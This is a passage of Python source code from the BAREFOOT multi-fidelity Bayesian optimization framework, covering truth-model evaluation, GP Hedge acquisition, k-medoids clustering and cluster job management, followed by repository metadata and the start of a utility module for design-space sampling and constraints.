temp_y, temp_index, costs, count\n \n def __call_Truth(self, params, count):\n # This function evaluates the truth model at the points defined by the \n # framework. The parameters for the calculation are defined elsewhere\n # and this framework just runs the evaluations\n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params)) \n costs = np.zeros(len(params))\n # Run the concurrent calculations and extract the results\n self.logger.info(\"Start Truth Model Evaluations | {} Sets\".format(len(params)))\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n costs[par[\"ParamIndex\"]] += self.modelCosts[par[\"Model Index\"]]\n # if the truth function fails to evaluate, it should return false\n # and therefore the results are not included in the output\n if results != False:\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n count[par[\"Model Index\"]] += 1\n if not self.maximize:\n results = (-1)*results\n self.reificationObj.update_truth(par[\"Input Values\"], results)\n # Remove any calculations that failed from the output and save the \n # data\n temp_x = temp_x[np.where(temp_y != 0)]\n temp_y = temp_y[np.where(temp_y != 0)]\n temp_index = temp_index[np.where(temp_y != 0)]\n self.logger.info(\"Truth Model Evaluations Completed\")\n if self.tmSampleOpt == \"Hedge\":\n self.__update_Hedge_Probabilities(\"TM\")\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n self.totalBudgetLeft -= self.batchSize*self.modelCosts[-1]\n if np.max(temp_y) > self.maxTM:\n self.maxTM = np.max(temp_y)\n # Return the updated model call counts\n return count\n \n def __singleAcqFuncApproach(self, x_test, new_mean, calcPerProcess):\n # this function is set up to be used in conjunction with the 
GP Hedge\n # approach to call the required acquisition function calls\n if self.multinode > 0:\n kg_output, process_cost = self.__run_multinode_acq_func(x_test, \n new_mean, \n calcPerProcess)\n else:\n kg_output, process_cost = self.__run_singlenode_acq_func(x_test, \n new_mean)\n return kg_output, process_cost\n \n def __gpHedgeApproach(self, x_test, new_mean, calcPerProcess):\n # This function is for using the GP Hedge Portfolio optimization approach\n \n # Calculate the probabilities for each acquisition function\n prob = self.gpHedgeProb/np.sum(self.gpHedgeProb)\n # determine the index of the function with the highest probability\n index_Max_prob = np.where(prob == np.max(prob))[0][0]\n self.gpHedgeTrack.append(index_Max_prob)\n # run the individual acquisition function evaluations\n output, process_cost = self.__singleAcqFuncApproach(x_test, new_mean, calcPerProcess)\n # the output will be a list of lists, choose the one corresponding to the \n # maximum probability\n kg_output = output[index_Max_prob]\n \n clusters = []\n # determine the batch of next best points for all acquisition function\n # outputs for use in calculating the gain later\n for ii in range(4):\n cluster_output = np.array(output[ii], dtype=object)\n # Cluster the acquisition function output\n medoid_out = self.__kg_calc_clustering(cluster_output)\n clusters.append(medoid_out)\n # save the clusters\n with open(\"data/hedgeClusters\", 'wb') as f:\n dump(clusters, f)\n # return the output from the selected function\n return kg_output, process_cost\n \n def __update_Hedge_Probabilities(self, models):\n # at each iteration when using the GP Hedge approach it is necessary to \n # calculate the gain associated with each acquisition function\n \n # load the data, which is the clusters from each acquisition function output\n with open(\"data/hedgeClusters\", 'rb') as f:\n clusters = load(f)\n \n parameters = []\n parameterFileData = []\n # initialize the parameters for the fused model calculations and\n # start the calculation\n self.logger.debug(\"Define Parameters for Max Value Evaluations\")\n parameterIndex = 0\n parameterFileIndex = 0\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n \n x_index = 6 + self.nDim\n # for each set of results, define the parameters and evaluate all the\n # fused model GPs\n for ii in range(4):\n for mm in range(self.hpCount):\n if models == \"ROM\":\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, clusters[ii][:,x_index:], self.maxTM, 0.01, ii))\n elif models == \"TM\":\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, clusters[ii], self.maxTM, 0.01, ii))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n # save each set of 500 parameters in a file\n if len(parameterFileData) == 500:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n # save the last set of parameters in a file\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n # run all the calculations concurrently and obtain the outputs\n fused_output = [[],[],[],[]]\n count = 0\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(evaluateFusedModel,parameters)):\n params, results = 
result_from_process\n fused_output[results[0]].append(results[1])\n count += 1\n \n # update the gain for each acquisition function for either the ROM or TM\n if models == \"ROM\":\n for ii in range(4):\n # # Mean of output\n # mean_output = np.mean(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHist[ii].append(np.max(mean_output))\n # Max of output\n mean_output = np.max(np.array(fused_output[ii]).transpose(), axis=1)\n self.gpHedgeHist[ii].append(np.max(mean_output))\n # # Sum of output\n # mean_output = np.sum(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHist[ii].append(np.max(mean_output))\n \n if len(self.gpHedgeHist[ii]) > 2*self.tmIterLim:\n self.gpHedgeHist[ii] = self.gpHedgeHist[ii][1:]\n self.gpHedgeProb = np.sum(self.gpHedgeHist, axis=1)\n elif models == \"TM\":\n for ii in range(4):\n # # Mean of output\n # mean_output = np.mean(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHistTM[ii].append(np.max(mean_output))\n # Max of output\n mean_output = np.max(np.array(fused_output[ii]).transpose(), axis=1)\n self.gpHedgeHistTM[ii].append(np.max(mean_output))\n # # Sum of output\n # mean_output = np.sum(np.array(fused_output[ii]).transpose(), axis=1)\n # self.gpHedgeHistTM[ii].append(np.max(mean_output))\n if len(self.gpHedgeHistTM[ii]) > 2*self.tmIterLim:\n self.gpHedgeHistTM[ii] = self.gpHedgeHistTM[ii][1:]\n self.gpHedgeProbTM = np.sum(self.gpHedgeHistTM, axis=1)\n \n def __singleAcqFused(self, tm_test):\n # For the GP Hedge approach for the Truth Model, this function\n # calls the individual calculations in either single- or multi-node configuration\n if self.multinode > 0:\n fused_output = self.__run_multinode_fused(tm_test)\n else:\n fused_output = self.__run_singlenode_fused(tm_test)\n return fused_output\n \n def __hedgeFused(self, tm_test):\n # This function controls the use of the GP Hedge approach in the calculation \n # of the next best points for the Truth model\n \n # calculate the most recent probabilities and determine which acquisition\n # function has the maximum probability\n prob = self.gpHedgeProbTM/np.sum(self.gpHedgeProbTM)\n index_Max_prob = np.where(prob == np.max(prob))[0][0]\n self.gpHedgeTrackTM.append(index_Max_prob)\n \n # obtain the outputs from the acquisition functions\n output = self.__singleAcqFused(tm_test)\n \n fused_output = output[index_Max_prob]\n \n max_values = np.zeros((tm_test.shape[0],2))\n # process the selected output to remove duplicates\n for ii in range(len(fused_output)):\n if max_values[fused_output[ii][1],0] != 0:\n if max_values[fused_output[ii][1],0] < fused_output[ii][0]:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n else:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n \n fused_output = max_values[np.where(max_values[:,0]!=0)]\n \n if fused_output.shape[0] == 0:\n fused_output = np.array([[0,0]])\n \n self.logger.info(\"Max Value Calculations Completed\")\n\n clust = []\n # cluster all the outputs, for the calculation of the gain at the\n # end of the iteration\n for ii in range(4):\n cluster_output = np.array(output[ii], dtype=object)\n # Cluster the acquisition function output\n try:\n if cluster_output.shape[0] > self.batchSize:\n medoids, clusters = k_medoids(cluster_output, self.batchSize)\n else:\n medoids = []\n for iii in range(cluster_output.shape[0]):\n medoids.append(iii)\n except:\n medoids, clusters = 
k_medoids(cluster_output, 1)\n clust.append(np.array(tm_test[medoids,:], dtype=np.float))\n # save the clusters for use later\n with open(\"data/hedgeClusters\", 'wb') as f:\n dump(clust, f)\n \n return fused_output\n \n def __close_subs_on_error(func):\n \"\"\"\n If an error occurs during the optimization, a multinode calculation must\n still close all subprocesses to avoid excessive computing hour costs\n \"\"\"\n def close_subs(self):\n no_error = False\n try:\n func(self)\n no_error = True\n except Exception as err:\n self.logger.critical(\"Optimization Code Failed - See Error Below\")\n self.logger.exception(err)\n \n if self.multinode > 0:\n for fname in range(self.multinode):\n with open(\"{}/subprocess/close{}\".format(self.workingDir, fname), 'w') as f:\n f.write(\"Close Subprocess {}\".format(fname))\n return no_error\n return close_subs\n \n @__close_subs_on_error\n def run_optimization(self):\n \"\"\"\n This is the main optimization control function which handles all the calculations\n of the BAREFOOT Framework\n \"\"\"\n \n self.logger.info(\"Start BAREFOOT Framework Calculation\")\n # Check if the calculation requires multiple nodes and start them if necessary\n if self.multinode > 0:\n calcPerProcess, all_started = self.__start_subprocesses__(self.multinode)\n else:\n calcPerProcess, all_started = (0, True)\n # Once all subprocesses have started, start the main calculation\n if all_started:\n start_process = True\n while start_process:\n text_num = str(self.currentIteration)\n self.logger.info(\"#########################################################\")\n self.logger.info(\"# Start Iteration : {} #\".format(\"0\"*(4-len(text_num))+text_num))\n self.logger.info(\"#########################################################\")\n self.timeCheck = time()\n \n # Check constraints and obtain latin-hypercube sampled test points\n evalP = []\n for pp in range(len(self.ROM)):\n evalP.append(np.array(self.evaluatedPoints.loc[self.evaluatedPoints['Model Index']==pp,self.inputLabels]))\n \n x_test, check = apply_constraints(self.sampleCount, \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func,\n self.sampleScheme,evalP)\n \n \n # If constraints can't be satisfied, notify the user in the log\n if check:\n self.logger.debug(\"ROM - All constraints applied successfully {}/{}\".format(x_test.shape[0], self.sampleCount))\n else:\n self.logger.critical(\"ROM - Sample Size NOT met due to constraints! 
Continue with {}/{} Samples\".format(x_test.shape[0], self.sampleCount))\n \n new_mean = []\n # obtain predictions from the low-order GPs\n for iii in range(len(self.ROM)):\n new, var = self.reificationObj.predict_low_order(x_test, iii)\n new_mean.append(new)\n \n # Calculate the Acquisition Function for each of the test points in each\n # model for each set of hyperparameters\n \n if self.acquisitionFunc == \"Hedge\":\n kg_output, process_cost = self.__gpHedgeApproach(x_test, new_mean, calcPerProcess)\n else:\n kg_output, process_cost = self.__singleAcqFuncApproach(x_test, new_mean, calcPerProcess)\n \n kg_output = np.array(kg_output, dtype=object)\n \n # Cluster the acquisition function output\n medoid_out = self.__kg_calc_clustering(kg_output)\n \n model_cost = time()-self.timeCheck + process_cost\n self.timeCheck = time()\n \n # Call the reduced order models\n temp_x, temp_y, temp_index, costs, count = self.__call_ROM(medoid_out)\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n \n if self.acquisitionFunc == \"Hedge\":\n self.__update_Hedge_Probabilities(\"ROM\")\n\n self.totalBudgetLeft -= np.sum(costs) + model_cost\n self.tmBudgetLeft -= np.sum(costs) + model_cost\n self.logger.info(\"ROM Function Evaluations Completed\")\n \n if (self.tmBudgetLeft < 0) or (self.tmIterCount == self.tmIterLim):\n self.logger.info(\"Start Truth Model Evaluations\")\n \n evalP = [np.array(self.evaluatedPoints.loc[self.evaluatedPoints['Model Index']==-1,self.inputLabels])]\n \n # create a test set that is dependent on the number of dimensions \n tm_test, check = apply_constraints(int(40000/(self.nDim*self.nDim)), \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func, False, evalP)\n if check:\n self.logger.debug(\"Truth Model Query - All constraints applied successfully\")\n else:\n self.logger.critical(\"Truth Model Query - Some or All Constraints Could Not Be Applied! 
Continuing Without Constraints\")\n \n # Evaluate the acquisition function to determine the next best\n # points to evaluate\n if self.tmSampleOpt == \"Hedge\":\n fused_output = self.__hedgeFused(tm_test)\n else:\n fused_output = self.__singleAcqFused(tm_test)\n \n fused_output = np.array(fused_output, dtype=object)\n # Cluster the output to obtain the correct batch size\n if fused_output.shape[0] > self.batchSize:\n medoids, clusters = k_medoids(fused_output, self.batchSize)\n else:\n medoids = []\n for iii in range(fused_output.shape[0]):\n medoids.append(iii)\n \n # define the parameters for the Truth Model Evaluations\n params = []\n param_index = 0\n self.logger.debug(\"Define Parameters for Truth Model Evaluations\")\n for iii in range(len(medoids)):\n params.append({\"Model Index\":-1,\n \"Model\":self.TM,\n \"Input Values\":np.array(tm_test[int(fused_output[medoids[iii],1]),:], dtype=np.float),\n \"ParamIndex\":param_index})\n param_index += 1\n \n self.tmIterCount = 0\n self.tmBudgetLeft = self.tmBudget\n \n # If an external Truth Model is used, submit the data for\n # saving to output\n if self.externalTM:\n self.__external_TM_data_save(params, count)\n break\n else:\n # If the subprocesses need to be closed, close them\n if not self.keepSubRunning:\n for fname in range(self.multinode):\n with open(\"{}/subprocess/close{}\".format(self.workingDir, fname), 'w') as f:\n f.write(\"Close Subprocess {}\".format(fname))\n self.logger.warning(\"Close Subprocess {}\".format(fname))\n # otherwise, query the Truth Model directly\n count = self.__call_Truth(params, count)\n \n # for multinode calculations, check if subprocesses are being kept\n # running and restart if not\n if self.keepSubRunning:\n pass\n else:\n if (self.totalBudgetLeft < 0) or (self.currentIteration >= self.iterLimit):\n pass\n else:\n self.__restart_subs()\n \n # save the required outputs\n self.__add_to_iterationData(time()-self.timeCheck + model_cost, count)\n self.timeCheck = time()\n \n if self.updateROMafterTM:\n self.__update_reduced_order_models__()\n \n self.__save_output_dataframes()\n self.__save_calculation_state()\n self.logger.info(\"Iteration {} Completed Successfully\".format(self.currentIteration))\n \n if (self.totalBudgetLeft < 0) or (self.currentIteration >= self.iterLimit):\n self.logger.info(\"#########################################################\")\n self.logger.info(\"# #\")\n self.logger.info(\"# Iteration or Budget Limit Met or Exceeded #\")\n self.logger.info(\"# BAREFOOT Calculation Completed #\")\n self.logger.info(\"# #\")\n self.logger.info(\"#########################################################\")\n start_process = False\n \n self.currentIteration += 1\n self.tmIterCount += 1\n \n \n def __kg_calc_clustering(self, kg_output):\n # This function clusters the output from the Reduced Order Model stage \n # acquisition function evaluations. There is some processing required to \n # obtain the correct format.\n \n # convert to a numpy array for ease of indexing\n # kg_output = np.array(kg_output, dtype=object)\n point_selection = {}\n self.logger.debug(\"Extract Points for Clustering from Acquisition Function Evaluations\")\n # process the output to obtain the correct format for the clustering\n # (model index, acquisition function value, input index)\n \n for iii in range(kg_output.shape[0]):\n try:\n if kg_output[iii,3] in point_selection[kg_output[iii,2]]['models']:\n if kg_output[iii,1] > point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]]:\n 
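# keep only the highest acquisition value seen so far for this\n # (test point, model) pair\n 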
point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]] = kg_output[iii,1]\n point_selection[kg_output[iii,2]]['kg_out'][kg_output[iii,3]] = iii\n else:\n point_selection[kg_output[iii,2]]['models'].append(kg_output[iii,3])\n point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]] = kg_output[iii,1]\n point_selection[kg_output[iii,2]]['kg_out'][kg_output[iii,3]] = iii\n except KeyError:\n point_selection[kg_output[iii,2]] = {'models':[kg_output[iii,3]],\n 'nu':[],\n 'kg_out':[]}\n for mm in range(len(self.ROM)):\n point_selection[kg_output[iii,2]]['nu'].append(1e-6)\n point_selection[kg_output[iii,2]]['kg_out'].append(-1)\n point_selection[kg_output[iii,2]]['nu'][kg_output[iii,3]] = kg_output[iii,1]\n point_selection[kg_output[iii,2]]['kg_out'][kg_output[iii,3]] = iii\n \n med_input = [[],[],[],[]] \n for index in point_selection.keys():\n for jjj in range(len(point_selection[index]['models'])):\n med_input[0].append(point_selection[index]['nu'][point_selection[index]['models'][jjj]])\n med_input[1].append(index)\n med_input[2].append(point_selection[index]['models'][jjj])\n med_input[3].append(point_selection[index]['kg_out'][point_selection[index]['models'][jjj]])\n med_input = np.array(med_input).transpose()\n \n \n # Since there may be too many duplicates when using small numbers of\n # test points and hyper-parameters, check to make sure and then return\n # all the points if there are fewer than the required number of points\n self.logger.debug(\"Cluster Acquisition Function Evaluations | {}\".format(med_input.shape))\n if med_input.shape[0] > self.batchSize:\n medoids, clusters = k_medoids(med_input[:,0:3], self.batchSize)\n else:\n medoids, clusters = k_medoids(med_input[:,0:3], 1) \n \n # next, need to get the true values for each of the medoids and update the\n # models before starting next iteration.\n self.logger.debug(\"Extract True Values for Medoids\")\n medoid_index = []\n for i in range(len(medoids)):\n medoid_index.append(int(med_input[medoids[i],3]))\n medoid_out = kg_output[medoid_index,:]\n self.logger.info(\"Clustering of Acquisition Function Evaluations Completed\")\n return medoid_out \n \n def __start_subprocesses__(self, subprocess_count):\n # The subprocesses require a separate directory in the main BAREFOOT\n # directory, so these need to be created if they don't exist\n try:\n os.mkdir('{}/subprocess'.format(self.workingDir))\n self.logger.debug(\"Subprocess Directory Created\")\n except FileExistsError:\n self.logger.debug(\"Subprocess Directory Already Exists\")\n pass\n try:\n os.mkdir('{}/subprocess/LSFOut'.format(self.workingDir))\n self.logger.debug(\"LSFOut Directory Created\")\n except FileExistsError:\n self.logger.debug(\"LSFOut Directory Already Exists\")\n pass\n # These strings are used to create the job files for the subprocesses used \n # when running the calculations in multi-node configuration\n with open(\"{}/data/processStrings\".format(self.workingDir), 'rb') as f:\n processStrings = load(f)\n \n self.logger.info(\"Strings for Subprocess Shell Files Loaded\")\n \n # extract the two process strings and calculate how many calculations\n # will be done per subprocess\n subProcessStr = processStrings[0]\n runProcessStr = processStrings[1]\n calculation_count = self.sampleCount*self.hpCount*(len(self.ROM))\n if calculation_count % subprocess_count == 0:\n calcPerProcess = int(calculation_count/subprocess_count)\n else:\n calcPerProcess = int(calculation_count/subprocess_count) + 1\n \n self.logger.info(\"{} Subprocess Jobs | {} Calculations per 
Subprocess\".format(subprocess_count, calcPerProcess))\n # Start all subprocesses\n\n for fname in range(subprocess_count):\n with open(\"{}/subprocess/{}.sh\".format(self.workingDir, fname), 'w') as f:\n f.write(subProcessStr.format(fname))\n with open(\"{}/subprocess/submit{}.sh\".format(self.workingDir, fname), 'w') as f:\n f.write(runProcessStr.format(fname))\n \n os.chmod(\"{}/subprocess/submit{}.sh\".format(self.workingDir, fname), 0o775)\n subprocess.run([\"{}/subprocess/submit{}.sh\".format(self.workingDir, fname)], shell=True)\n # wait for all subprocesses to start\n all_pending = True\n self.logger.info(\"Waiting for Subprocess Jobs to start\")\n count = 0\n all_started = False\n while all_pending:\n sleep(30)\n total_started = 0\n for fname in range(subprocess_count):\n if os.path.exists(\"{}/subprocess/sub{}.start\".format(self.workingDir, fname)):\n total_started += 1\n count += 1\n if total_started == subprocess_count:\n all_pending = False\n all_started = True\n self.logger.info(\"All Subprocess Jobs Started Successfully\")\n # waiting for 2 hours for all the subprocesses to start will stop the waiting\n # and return false from this function to say that all the processes weren't\n # started yet. This is to save on computational hours if there is a problem\n # but this functionality can be disabled if desired.\n if count == 240:\n all_pending = False\n self.logger.critical(\"Subprocess Jobs Outstanding after 2 Hours | {}/{} Jobs Started\".format(total_started, subprocess_count))\n \n return calcPerProcess, all_started\n\n def __update_reduced_order_models__(self):\n # If the reduced order models are configured to be retrained after more\n # truth model evaluations have been conducted, this function re-evaluates\n # all the evaluated points and reconstructs the reification object with\n # the new values.\n \n self.logger.info(\"Recalculate all evaluated points for ROM to ensure correct model results are used\")\n self.ROMInitInput = []\n self.ROMInitOutput = []\n TMDataX = self.reificationObj.x_true\n TMDataY = self.reificationObj.y_true\n params = []\n count = []\n param_index = 0\n # obtain the parameters for the evaluations\n for ii in range(len(self.ROM)):\n count.append(0)\n for jj in range(self.initDataPathorNum[ii]):\n params.append({\"Model Index\":ii,\n \"Model\":self.ROM[ii],\n \"Input Values\":self.reificationObj.x_train[ii][jj,:],\n \"ParamIndex\":param_index})\n param_index += 1\n self.ROMInitInput.append(np.zeros_like(self.reificationObj.x_train[ii]))\n self.ROMInitOutput.append(np.zeros_like(self.reificationObj.y_train[ii]))\n \n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params))\n \n # Run the evaluations concurrently and store the outputs \n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n if par[\"Model Index\"] != -1:\n self.ROMInitInput[par[\"Model Index\"]][count[par[\"Model Index\"]],:] = par[\"Input Values\"]\n self.ROMInitOutput[par[\"Model Index\"]][count[par[\"Model Index\"]]] = results\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n self.logger.info(\"Create New Reification Object\")\n # Recreate the reification object for further calculations\n self.reificationObj = model_reification(self.ROMInitInput, self.ROMInitOutput, \n 
self.modelParam['model_l'], \n self.modelParam['model_sf'], \n self.modelParam['model_sn'], \n self.modelParam['means'], \n self.modelParam['std'], \n self.modelParam['err_l'], \n self.modelParam['err_sf'], \n self.modelParam['err_sn'], \n TMDataX, TMDataY, \n len(self.ROM), self.nDim, self.covFunc)\n # save the new data\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n self.__add_to_iterationData(time()-self.timeCheck, np.array(count))\n self.timeCheck = time()\n self.logger.info(\"New Evaluations Saved | Reification Object Updated\")\n pass\n \n def __external_TM_data_save(self, TMEvaluationPoints, count):\n # When using an external Truth Model, it is necessary to save the next\n # best points for use in the external calculations or experiments\n outputData = np.zeros((len(TMEvaluationPoints), self.nDim+1))\n for ii in range(len(TMEvaluationPoints)):\n outputData[ii,0:self.nDim] = TMEvaluationPoints[ii][\"Input Values\"]\n \n colNames = self.inputLabels.append(\"y\")\n outputData = pd.DataFrame(outputData, columns=colNames)\n outputData.to_csv('{}/results/{}/TruthModelEvaluationPoints.csv'.format(self.workingDir, \n self.calculationName))\n with open('{}/results/{}/countData'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(count, f)\n self.__save_calculation_state()\n self.logger.critical(\"Truth Model Evaluation Points Copied to File | Restart Process when results are ready\")\n \n def __external_TM_data_load(self, workingDir, calculationName):\n # When restarting the framework after using an external Truth Model\n # the data from the model must be loaded into the framework\n self.__load_from_save(workingDir, calculationName)\n with open('{}/results/{}/countData'.format(self.workingDir, self.calculationName), 'rb') as f:\n count = load(f)\n TMData = pd.read_csv('{}/results/{}/TruthModelEvaluationPoints.csv'.format(self.workingDir, \n self.calculationName))\n TMData = np.array(TMData)\n \n temp_x = np.zeros((TMData.shape[0], self.nDim))\n temp_y = np.zeros((TMData.shape[0]))\n temp_index = np.zeros((TMData.shape[0]))\n \n for ii in range(TMData.shape[0]):\n temp_x[ii,:] = TMData[ii,0:self.nDim]\n temp_y[ii] = TMData[ii,self.nDim+1]\n temp_index[ii] = -1\n count[-1] += 1\n # After loading the data, the reification object is updated and the new\n # data saved to the normal framework outputs\n self.logger.info(\"Truth Model Evaluations Loaded\")\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n if not self.maximize:\n temp_y = (-1)*temp_y\n self.reificationObj.update_truth(temp_x, temp_y)\n self.totalBudgetLeft -= self.batchSize*self.modelCosts[-1]\n \n if np.max(temp_y) > self.maxTM:\n self.maxTM = np.max(temp_y)\n \n self.__add_to_iterationData(time()-self.timeCheck, count)\n self.timeCheck = time()\n \n if self.updateROMafterTM:\n self.__update_reduced_order_models__()\n\n self.__save_output_dataframes()\n self.__save_calculation_state()\n self.logger.info(\"Iteration {} Completed Successfully\".format(self.currentIteration))\n self.currentIteration += 1\n self.tmIterCount += 1\n self.logger.info(\"Finished Loading External TM Data\")\n \n \n" }, { "alpha_fraction": 0.5549569725990295, "alphanum_fraction": 0.5643748641014099, "avg_line_length": 37.975830078125, "blob_id": "48a0db145b10775ae048e0bb38064ecf41ce38ac", "content_id": "67ea82794938f4de60217742ba7965fdbaab91e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25802, "license_type": "no_license", "max_line_length": 105, 
"num_lines": 662, "path": "/util.py", "repo_name": "jtao/BAREFOOT-Framework", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 24 14:36:19 2021\n\n@author: Richard Couperthwaite\n\"\"\"\n\nimport numpy as np\nfrom pyDOE import lhs\nfrom kmedoids import kMedoids\nfrom scipy.spatial import distance_matrix\nfrom acquisitionFunc import expected_improvement, knowledge_gradient, thompson_sampling\nimport pandas as pd\nfrom pickle import load\n\ndef k_medoids(sample, num_clusters):\n # clusters the samples into the number of clusters (num_clusters) according \n # to the K-Medoids clustering algorithm and returns the medoids and the \n # samples that belong to each cluster\n D = distance_matrix(sample, sample)\n M, C = kMedoids(D, num_clusters)\n return M, C \n\ndef call_model(param):\n # this function is used to call any model given in the dictionary of\n # parameters (param)\n output = param[\"Model\"](param[\"Input Values\"])\n return output\n\ndef cartesian(*arrays):\n # combines a set of arrays (one per dimension) so that all combinations of\n # all the arrays are in a single matrix with columns for each dimension\n mesh = np.meshgrid(*arrays) # standard numpy meshgrid\n dim = len(mesh) # number of dimensions\n elements = mesh[0].size # number of elements, any index will do\n flat = np.concatenate(mesh).ravel() # flatten the whole meshgrid\n reshape = np.reshape(flat, (dim, elements)).T # reshape and transpose\n return reshape\n\ndef sampleDesignSpace(ndim, nsamples, sampleScheme):\n # This function provides three approaches to sampling of the design space\n # firstly, Latin hypercube sampling (LHS)\n # secondly, a grid based appraoch (Grid)\n # and the final approach allows for custom sampling of specific values\n # in this last approach, any additional samples required are found by \n # Latin Hypercube sampling\n if sampleScheme == \"LHS\":\n x = lhs(ndim, nsamples)\n if sampleScheme == \"Grid\":\n for jjj in range(nsamples-1):\n input_arr = np.linspace(0,1,jjj+1)\n all_arr = []\n for ii in range(ndim):\n all_arr.append(input_arr)\n x = cartesian(*all_arr)\n if x.shape[0] >= nsamples:\n return x\n if sampleScheme == \"Custom\":\n dfInputs = pd.read_csv(\"data/possibleInputs.csv\", index_col=0)\n if dfInputs.shape[0] > nsamples:\n x = dfInputs.sample(n=nsamples)\n else:\n x_other = pd.DataFrame(lhs(ndim, nsamples-dfInputs.shape[0]),columns=dfInputs.columns)\n x = pd.concat((dfInputs, x_other)) \n return np.array(x)\n\ndef apply_constraints(samples, ndim, resolution=[], A=[], b=[], Aeq=[], beq=[], \n lb=[], ub=[], func=[], sampleScheme=\"LHS\", opt_sample_size=True,\n evaluatedPoints=[]):\n # This function handles the sampling of the design space and the application \n # of the constraints to ensure that any points sampled satisfy the constratints\n sampleSelection = True\n constraints = np.zeros((5))\n if A != []:\n constraints[0] = 1\n if Aeq != []:\n constraints[1] = 1\n if lb != []:\n constraints[2] = 1\n if ub != []:\n constraints[3] = 1\n if func != []:\n if (type(func) == list):\n constraints[4] = len(func)\n else:\n constraints[4] = 1\n lhs_samples = samples\n \n x_largest = []\n largest_set = 0\n \n while sampleSelection:\n try:\n x = sampleDesignSpace(ndim, lhs_samples, sampleScheme)\n except:\n x = sampleDesignSpace(ndim, lhs_samples, \"LHS\")\n if resolution != []:\n x = np.round(x, decimals=resolution)\n constr_check = np.zeros((x.shape[0], ndim))\n \n # Apply inequality constraints\n if (A != []) and (b != []) and (len(A) == ndim):\n A_tile = 
np.tile(np.array(A), (x.shape[0],1))\n constr_check += A_tile*x <= b\n constraints[0] = 0\n\n # Apply equality constraints\n if (Aeq != []) and (beq != []):\n Aeq_tile = np.tile(np.array(Aeq), (x.shape[0],1))\n constr_check += Aeq_tile*x <= beq\n constraints[1] = 0\n \n # Apply Lower and Upper Bounds\n if (lb != []) and (len(lb) == ndim):\n lb_tile = np.tile(np.array(lb).reshape((1,ndim)), (x.shape[0],1))\n constr_check += x < lb_tile\n constraints[2] = 0\n if (ub != []) and (len(ub) == ndim):\n ub_tile = np.tile(np.array(ub).reshape((1,ndim)), (x.shape[0],1))\n constr_check += x > ub_tile\n constraints[3] = 0\n \n constr_check = np.sum(constr_check, axis=1)\n \n # Apply custom function constraints\n if (type(func) == list) and (func != []):\n for ii in range(len(func)):\n try:\n constr_check += func[ii](x)\n constraints[4] -= 1\n except:\n pass\n elif (type(func) != list) and (func != []):\n try:\n constr_check += func(x) \n constraints[4] = 0\n except:\n pass\n \n # Duplicate Check: if a particular sample has been queried from all models\n # it needs to be removed from the potential samples. This won't stop duplicates\n # getting in since we can't exclude a point till it has been evaluated from all models\n if evaluatedPoints != []:\n all_test = np.zeros_like(constr_check)\n for evalPoints in evaluatedPoints:\n res = (x[:, None] == evalPoints).all(-1).any(-1)\n all_test += res\n all_test[np.where(all_test<len(evaluatedPoints))] = 0\n \n constr_check += all_test\n \n index = np.where(constr_check == 0)[0]\n \n # If it is chosen to optimize the sample size, the loop is continued to \n # ensure that as close to the required number of samples are acquired\n if opt_sample_size:\n if index.shape[0] >= samples:\n x = x[index[0:samples],:]\n sampleSelection = False\n if np.sum(constraints) != 0:\n const_satisfied = False\n else:\n const_satisfied = True\n else:\n if len(index) > largest_set:\n largest_set = len(index)\n x_largest = x[index,:]\n if lhs_samples/samples < ndim*2000:\n lhs_samples += samples*100\n else:\n x = x_largest\n sampleSelection = False\n const_satisfied = False\n # if the choice is to not optimize, the samples that pass all constraints\n # will be returned. This can lead to less samples than specified.\n else:\n x = x[index,:]\n sampleSelection = False\n const_satisfied = True\n return x, const_satisfied\n\ndef calculate_KG(param):\n \"\"\"\n Parameters\n ----------\n param : tuple\n The input is a tuple that contains the data required for calculating the\n knowledge gradient of a fused model constructed out of a reification \n model object.\n\n Returns\n -------\n results : list\n The output from the module contains information on some of the parameters\n used as 